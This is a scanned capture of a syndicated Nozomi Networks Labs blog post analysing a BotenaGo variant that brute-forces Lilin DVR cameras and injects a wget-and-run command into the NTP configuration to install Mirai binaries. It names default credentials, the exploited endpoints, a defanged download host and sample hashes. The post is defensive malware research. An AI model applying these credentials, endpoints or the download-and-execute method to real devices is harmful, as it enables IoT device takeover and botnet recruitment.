securityboulevard.com
Open in
urlscan Pro
2606:4700:10::6816:29c
Public Scan
URL:
https://securityboulevard.com/2022/04/new-botenago-variant-discovered-by-nozomi-networks-labs/?web_view=true
Submission: On April 19 via api from US — Scanned from DE
Submission: On April 19 via api from US — Scanned from DE
Form analysis 2 forms found in the DOM
GET https://securityboulevard.com/
<form action="https://securityboulevard.com/" class="search-form searchform clearfix" method="get">
<div class="search-wrap">
<input type="text" placeholder="Search" class="s field" name="s">
<button class="search-icon" type="submit"></button>
</div>
</form>POST /2022/04/new-botenago-variant-discovered-by-nozomi-networks-labs/?web_view=true
<form method="post" enctype="multipart/form-data" id="gform_10" action="/2022/04/new-botenago-variant-discovered-by-nozomi-networks-labs/?web_view=true">
<div class="gform_body gform-body">
<ul id="gform_fields_10" class="gform_fields top_label form_sublabel_below description_below">
<li id="field_10_1" class="gfield gfield_contains_required field_sublabel_below field_description_below hidden_label gfield_visibility_visible" data-js-reload="field_10_1"><label class="gfield_label" for="input_10_1">Email<span
class="gfield_required"><span class="gfield_required gfield_required_asterisk">*</span></span></label>
<div class="ginput_container ginput_container_email">
<input name="input_1" id="input_10_1" type="text" value="" class="large" placeholder="Your Email" aria-required="true" aria-invalid="false">
</div>
</li>
<li id="field_10_2" class="gfield gfield_html gfield_html_formatted gfield_no_follows_desc field_sublabel_below field_description_below gfield_visibility_visible" data-js-reload="field_10_2">
<div class="gsection_description"><a href="https://securityboulevard.com/privacy-policy/">View Security Boulevard <u>Privacy Policy</u></a></div>
</li>
<li id="field_10_3" class="gfield gform_hidden field_sublabel_below field_description_below gfield_visibility_visible" data-js-reload="field_10_3">
<div class="ginput_container ginput_container_text"><input name="input_3" id="input_10_3" type="hidden" class="gform_hidden" aria-invalid="false" value=""></div>
</li>
<li id="field_10_4" class="gfield gform_hidden field_sublabel_below field_description_below gfield_visibility_visible" data-js-reload="field_10_4">
<div class="ginput_container ginput_container_text"><input name="input_4" id="input_10_4" type="hidden" class="gform_hidden" aria-invalid="false" value=""></div>
</li>
<li id="field_10_5" class="gfield gfield--width-full field_sublabel_below field_description_below hidden_label gfield_visibility_visible" data-js-reload="field_10_5"><label class="gfield_label" for="input_10_5">CAPTCHA</label>
<div id="input_10_5" class="ginput_container ginput_recaptcha gform-initialized" data-sitekey="6Ld9rm8cAAAAAEa1mXDqRlCvlsP8t1u1weqyOCJn" data-theme="light" data-tabindex="-1" data-size="invisible" data-badge="bottomright">
<div class="grecaptcha-badge" data-style="bottomright"
style="width: 256px; height: 60px; display: block; transition: right 0.3s ease 0s; position: fixed; bottom: 14px; right: -186px; box-shadow: gray 0px 0px 5px; border-radius: 2px; overflow: hidden;">
<div class="grecaptcha-logo"><iframe title="reCAPTCHA"
src="https://www.google.com/recaptcha/api2/anchor?ar=1&k=6Ld9rm8cAAAAAEa1mXDqRlCvlsP8t1u1weqyOCJn&co=aHR0cHM6Ly9zZWN1cml0eWJvdWxldmFyZC5jb206NDQz&hl=en&v=6pQzWaE1NP-gB4FrqRViKjM-&theme=light&size=invisible&badge=bottomright&cb=y54k8tqawek9"
width="256" height="60" role="presentation" name="a-qq5z46rvxdr7" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox"
tabindex="-1"></iframe></div>
<div class="grecaptcha-error"></div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response"
style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea>
</div><iframe style="display: none;"></iframe>
</div>
</li>
<li id="field_10_6" class="gfield gform_validation_container field_sublabel_below field_description_below gfield_visibility_visible" data-js-reload="field_10_6"><label class="gfield_label" for="input_10_6">Phone</label>
<div class="ginput_container"><input name="input_6" id="input_10_6" type="text" value=""></div>
<div class="gfield_description" id="gfield_description_10_6">This field is for validation purposes and should be left unchanged.</div>
</li>
</ul>
</div>
<div class="gform_footer top_label"> <input type="submit" id="gform_submit_button_10" class="gform_button button" value="Subscribe Now"
onclick="if (!window.__cfRLUnblockHandlers) return false; if(window["gf_submitting_10"]){return false;} window["gf_submitting_10"]=true; "
onkeypress="if (!window.__cfRLUnblockHandlers) return false; if( event.keyCode == 13 ){ if(window["gf_submitting_10"]){return false;} window["gf_submitting_10"]=true; jQuery("#gform_10").trigger("submit",[true]); }">
<input type="hidden" class="gform_hidden" name="is_submit_10" value="1">
<input type="hidden" class="gform_hidden" name="gform_submit" value="10">
<input type="hidden" class="gform_hidden" name="gform_unique_id" value="">
<input type="hidden" class="gform_hidden" name="state_10" value="WyJbXSIsImExN2ZmNzMxNzRmOWUyZjU4NDM0NzI5MzVhYzMzZjI2Il0=">
<input type="hidden" class="gform_hidden" name="gform_target_page_number_10" id="gform_target_page_number_10" value="0">
<input type="hidden" class="gform_hidden" name="gform_source_page_number_10" id="gform_source_page_number_10" value="1">
<input type="hidden" name="gform_field_values" value="">
</div>
<p style="display: none !important;"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="1650363208249"></p>
</form>Text Content
Tuesday, April 19, 2022 * Local U.S. Governments and Municipalities at Risk of Foreign Nation Cyber Attacks * How to Mitigate Client-side Supply Chain Threats * We have entered the era of crafted malware * Regulatory Compliance – Holding Security Back or Forcing us to Reassess old biases? * Explosion of Machine Identities Creating Cybersecurity ‘Debt’ * * * * * * * SECURITY BOULEVARD The Home of the Security Bloggers Network Community Chats Webinars Library * Home * Cybersecurity News * Features * Industry Spotlight * News Releases * Security Bloggers Network * Latest Posts * Contributors * Syndicate Your Blog * Write for Security Boulevard * Events * Upcoming Events * Upcoming Webinars * On-Demand Events * On-Demand Webinars * Chat * Security Boulevard Chat * Marketing InSecurity Podcast * Library * Related Sites * Techstrong Group * Container Journal * DevOps.com * Security Boulevard * Techstrong Research * Techstrong TV * Devops Chat * DevOps Dozen * DevOps TV * Digital Anarchist * Media Kit * About Us * Analytics * AppSec * CISO * Cloud * DevOps * GRC * Identity * Incident Response * IoT / ICS * Threats / Breaches * More * Blockchain / Digital Currencies * Careers * Cyberlaw * Mobile * Social Engineering * Humor TwitterLinkedInFacebookRedditEmailShare IoT & ICS Security Malware Security Bloggers Network Home » Cybersecurity » IoT & ICS Security » New BotenaGo Variant Discovered by Nozomi Networks Labs NEW BOTENAGO VARIANT DISCOVERED BY NOZOMI NETWORKS LABS by Nozomi Networks Labs on April 18, 2022 According to AT&T Alien Labs, BotenaGo malware has been deployed with over 30 exploit functions, putting millions of IoT devices at risk of potential cyberattacks. BotenaGo is written in “Go”, which is a Google open-source programming language. While the use of open-source programming languages has its benefits, attackers have equally taken advantage, using Go to code malicious malware. Our research highlights Nozomi Networks Labs’ discovery of a new variant of the BotenaGo malware that specifically targets Lilin security camera DVR devices. We have named this sample “Lillin scanner” because of the name the developers used for it in the source code: /root/lillin.go. Let’s dive deeper into the functionality of this sample to show step-by-step how these kinds of scanners work. Figure 1. BotenaGo source code. The source code of the BotenaGo malware (Figure 1) was leaked in October 2021, which led to the creation of new variants based on the original. We decided to monitor samples that could have been generated utilizing parts of the BotenaGo source code. In doing so, we discovered a sample that contained certain similarities of BotenaGo. At the time of this research, the sample had not been detected by any malware detection engine in VirusTotal (Figure 2). Although the sample is quite large (2.8 MB), due to being written in Go, the portion of the actual malicious code is quite small and focuses on a single task. Its authors removed almost all of the the 30+ exploits present in BotenaGo’s original source code and reused some parts to exploit a different vulnerability that was over two years old. This may be why the sample hasn’t been detected until now. Figure 2. The file is not detected as a threat. LILLIN SCANNER FUNCTIONALITY In order to run, the scanner/exploiter needs a parameter to be passed in the command line. That will be the port being used to connect to each of the IP addresses that the program targets. Lillin scanner differs from BotenaGo in that it doesn’t check the banner for the given IPs. It is possible that this tool is chained with another program that builds lists of Lilin devices using services like Shodan or other mass scanning tools. Next, the sample will iterate over the IP addresses that it receives from the standard input. This portion of the code can easily be spotted in the original BotenaGo source code. These instructions will create one Goroutine (a sort of thread used in Go) per IP address executing the infectFunctionLilinDvr function, which follows the same naming convention as in BotenaGo. Figure 3. A loop creating Goroutines using the input from STDIN. The presence of strings with the names of the functions and the absence of any protection (many malware families use at least the modified version of UPX) means that it isn’t actually trying to protect itself against security products and reverse engineers. It reinforces the theory that this executable might mainly be intended to be used by attackers in manual mode. DEVICE ACCESS AND VULNERABILITY EXPLOITATION When the infectFunctionLilinDvr function receives the IP address to scan, it first checks if the device behind that IP can be accessed. The Lillin scanner contains 11 pairs of user-password credentials in its code. This is a difference from previous malware samples that, reportedly, abused only the credentials root/icatch99 and report/8Jg0SR8K50. These credentials are Base64-encoded to be used in the basic authentication needed to exploit the vulnerability that allows the Remote Code Execution (RCE). Figure 4. Credentials used for bruteforce access to the DVRs. Figure 5. Basic authentication attempt. Lillin scanner will loop over the 11 encoded credentials and will sequentially try to access the root directory, changing the Base64 string in the Authorization field. When the server response contains the string HTTP/1.1 200 or HTTP/1.0 200 it will consider the authentication to be successful and will attempt the exploitation of the Network Time Protocol (NTP) configuration vulnerability. This vulnerability, part of a set of security vulnerabilities affecting Lilin DVRs, was discovered in 2020 and was assigned a CVSS v3.1 score of 10.0 (Critical) by the vendor. The scanner will send particularly crafted HTTP POST requests to the URL paths /dvr/cmd and /cn/cmd in order to exploit a command injection vulnerability in the web interface. First, the scanner attempts to inject some code by submitting a POST request to the URL path /dvr/cmd. If successful, this request then modifies the NTP configuration of the camera. The modified configuration contains a command that, because of the vulnerability, will attempt to download a file named wget.sh from the IP address 136.144.41[.]169 and then immediately execute its content. If the command injection to /dvr/cmd is not successful, the scanner attempts the same attack to the endpoint /cn/cmd. Once the attack is complete, another request to the same endpoint restores the original NTP configuration. Figure 6. POST request with the injected wget command. The file wget.sh recursively downloads multiple executables for multiple architectures from 136.144.41[.]169. The targeted architectures are ARM, Motorola 68000, MIPS, PowerPC, SPARC, SuperH, x86. Figure 7. The content of wget.sh file. THE MIRAI MALWARE FAMILY In the third stage of this attack, multiple malicious samples for each architecture attempt to execute on the camera. These samples belong to the Mirai malware family, which is a widely known threat to IoT devices. All these samples have recently been submitted to VirusTotal (at the beginning of March 2022). For example, for the MIPS architecture, two samples have been identified as the third stage connected to the Mirai family: * ae0185189e463c6abddf8865972dac72630b6e515e79d3f7566f0983a0eae295 * 28f50f24c930b595f88257748f62d985436ecce1330ff52f09cdd13642591450 Figure 8. TVirusTotal graph showing the connection between the two ELF samples and wget request contained in the wget.sh file. For x86 architecture, the file 62ef086111b6816d332e298d00ac946c11fac0ed8708fa2668ad3c91ceb96dbf is downloaded and executed. An analysis of this sample reveals some typical behaviors of the Mirai malware. For example, while scanning new devices, Mirai typically bruteforces the authentication using a list of hardcoded credentials. In Figure 9, there is a non-exhaustive list of credentials used for the bruteforce. This list comes from the Mirai source code. Figure 9. Non-exhaustive list of hardcoded credentials used by Mirai malware from the source code. From the static analysis of the downloaded sample, we retrieved a list of credentials used in the scanning module, many of which are the same as the ones hardcoded in the Mirai source code. Figure 10. A portion of code from sample 62ef086111b6816d332e298d00ac946c11fac0ed8708fa2668ad3c91ceb96dbf using the same credentials hardcoded in the source code. Another behavior associated with the Mirai botnet is the exclusion of IP ranges belonging to the internal networks of the U.S. Department of Defense (DoD), U.S. Postal Service (USPS), General Electric (GE), Hewlett-Packard (HP), and others. Some of them are visible in Figure 11, which is taken from Mirai’s source code. Figure 11. Some of the IP ranges listed in the source code that are excluded while scanning. The same IP ranges are excluded from the scanning procedure in the sample we are analyzing. Moreover, we see that the verification of a randomly generated IP follows the same algorithm as the one implemented in Mirai’s source code. Figure 12. Portion of the sample code excluding some IP ranges while generating the IPs to scan. It seems that this tool has been quickly built using the code base of the BotenaGo malware. It shouldn’t be confused with a worm as its main goal is to infect its victims with Mirai executables with a list of IP addresses provided as input; it can’t automatically propagate itself. CONCLUSION Apart from working on completely new projects, attackers also commonly re-use already available code to build new malware. Monitoring the evolution of these projects helps create more robust and generic detections that remain proactive for a longer time, thus providing better protections against modern cyberthreats. Related Content WHITE PAPER THE S3CUREC4M PROJECT: VULNERABILITY RESEARCH IN MODERN IP VIDEO SURVEILLANCE TECHNOLOGIES Learn how to assess the security posture of an IP video surveillance system, including hardware extraction and firmware analysis techniques. Download Related Links * Blog: How IoT Botnets Evade Detection and Analysis * Blog: Critical Log4Shell (Apache Log4j) Zero-Day Attack Analysis * Blog: Reverse Engineering Obfuscated Firmware for Vulnerability Analysis * Blog: Methods for Extracting Firmware from OT Devices for Vulnerability Research * On-Demand Webinar: OT/IoT Security Review 2021 2H: Lessons for Critical Infrastructure The post New BotenaGo Variant Discovered by Nozomi Networks Labs appeared first on Nozomi Networks. *** This is a Security Bloggers Network syndicated blog from Nozomi Networks authored by Nozomi Networks Labs. Read the original post at: https://www.nozominetworks.com/blog/new-botenago-variant-discovered-by-nozomi-networks-labs/ April 18, 2022April 18, 2022 Nozomi Networks Labs 0 Comments All, Blog, iot, Labs, Labs Blogs, Malware, Nozomi Networks Labs * ← What are Active Directory FSMO roles and How do they Work * The Frozen Heart vulnerability in PlonK → TECHSTRONG TV – LIVE Click full-screen to enable volume control Watch latest episodes and shows SUBSCRIBE TO OUR NEWSLETTERS Get breaking news, free eBooks and upcoming events delivered to your inbox. * Email* * View Security Boulevard Privacy Policy * * * CAPTCHA * Phone This field is for validation purposes and should be left unchanged. Δ MOST READ ON THE BOULEVARD Attack on Panasonic Canada Shows Conti is Still Dangerous Software Supply Chain Attacks: Clear and Present Danger Gov’t Advisory Warns of Pipedream Malware Aimed at ICS Palo Alto Networks Report Reveals Cloud Security Challenges Understanding SASE and Zero-Trust to Strengthen Security New BotenaGo Variant Discovered by Nozomi Networks Labs 10 Ways to Implement AppSec Measures for Your Cloud Ecosystem 1,701 New Vulnerabilities: Vulnerability Intelligence Infographic, March 2022: Key Trends and Analysis PHP Web Application Security – How to protect your WordPress website This Week in Malware – Special Edition on Protestware and a Struts RCE Deja Vu UPCOMING WEBINARS Tue 19 USING DEVSECOPS FOR CONTINUOUS COMPLIANCE AND SECURITY AUTOMATION April 19 @ 11:00 am - 12:00 pm Thu 21 GETTING HASHICORP TERRAFORM INTO PRODUCTION April 21 @ 1:00 pm - 2:00 pm Mon 25 SURVEYING THE APPSEC LANDSCAPE April 25 @ 1:00 pm - 2:00 pm Tue 26 SHIFT LEFT: BALANCING DEVOPS AND INFRASTRUCTURE SECURITY April 26 @ 11:00 am - 12:00 pm Tue 26 RANSOMWARE INVESTIGATION: THE COMPLETE DEMO April 26 @ 3:00 pm - 4:00 pm More Webinars DOWNLOAD FREE EBOOK INDUSTRY SPOTLIGHT Cybersecurity Endpoint Industry Spotlight IoT & ICS Security Security Boulevard (Original) Vulnerabilities ESTABLISHING A ROOT OF TRUST IN EMBEDDED LINUX AND IOT April 18, 2022 Anita Buehrle | Yesterday 0 Comments Cybersecurity Data Security Identity & Access Industry Spotlight Network Security Security Boulevard (Original) ATTORNEY-CLIENT PRIVILEGE AND EMAIL PRIVACY April 7, 2022 Mark Rasch | Apr 07 0 Comments Cybersecurity Endpoint Industry Spotlight Network Security Security Awareness Security Boulevard (Original) HOW MSPS CAN FILL THE CYBERSECURITY SKILLS GAP February 17, 2022 Mike Adler | Feb 17 Comments Off on How MSPs can Fill the Cybersecurity Skills Gap TOP STORIES Cybersecurity Endpoint Featured Governance, Risk & Compliance IoT & ICS Security Malware News Security Awareness Security Boulevard (Original) Spotlight Threat Intelligence GOV’T ADVISORY WARNS OF PIPEDREAM MALWARE AIMED AT ICS April 15, 2022 Teri Robinson | 3 days ago 0 Comments Cybersecurity Data Security Featured Incident Response Malware News Security Boulevard (Original) Spotlight Threat Intelligence ATTACK ON PANASONIC CANADA SHOWS CONTI IS STILL DANGEROUS April 15, 2022 Teri Robinson | 3 days ago 0 Comments Cloud Security Cybersecurity Featured Identity & Access News Security Boulevard (Original) Spotlight Threat Intelligence Vulnerabilities PALO ALTO NETWORKS REPORT REVEALS CLOUD SECURITY CHALLENGES April 14, 2022 Michael Vizard | 4 days ago 0 Comments SECURITY HUMOR ROBERT M. LEE’S & JEFF HAAS’ LITTLE BOBBY COMIC – ‘WEEK 377’ JOIN THE COMMUNITY * Add your blog to Security Bloggers Network * Write for Security Boulevard * Bloggers Meetup and Awards * Ask a Question * Email: info@securityboulevard.com USEFUL LINKS * About * Media Kit * Sponsors Info * Copyright * TOS * DMCA Compliance Statement * Privacy Policy RELATED SITES * Techstrong Group * Container Journal * DevOps.com * Techstrong Research * Techstrong TV * DevOps Chat * DevOps Dozen * DevOps TV * Digital Anarchist * * * * * * * Copyright © 2022 Techstrong Group Inc. All rights reserved. ✓ Thanks for sharing! AddToAny More… Notifications previousnextslideshow